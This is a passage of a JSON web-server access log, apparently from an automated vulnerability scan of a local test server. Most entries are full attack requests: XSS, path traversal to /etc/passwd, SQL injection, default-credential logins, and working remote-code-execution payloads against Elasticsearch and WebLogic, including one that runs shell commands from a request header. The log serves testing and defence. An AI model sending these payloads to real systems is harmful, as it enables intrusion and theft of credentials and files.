+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MbJJRXhVPA9FKJuNgGKW74AD HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A297Mdiedz0ZdY6epZWlTQxgiiYw\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x22297Mdiedz0ZdY6epZWlTQxgiiYw.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/mysql2i/mysql2i.func.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.212","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"more=0&host=0&username=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.override.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inormalydonotexist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"{\x0D\x0A \x22size\x22: 1,\x0D\x0A \x22query\x22: {\x0D\x0A \x22filtered\x22: {\x0D\x0A \x22query\x22: {\x0D\x0A \x22match_all\x22: {\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A },\x0D\x0A \x22script_fields\x22: {\x0D\x0A \x22command\x22: {\x0D\x0A \x22script\x22: \x22import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getInputStream()).useDelimiter(\x5C\x22\x5C\x5C\x5C\x5CA\x5C\x22).next();\x22\x0D\x0A }\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search?pretty HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:26 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 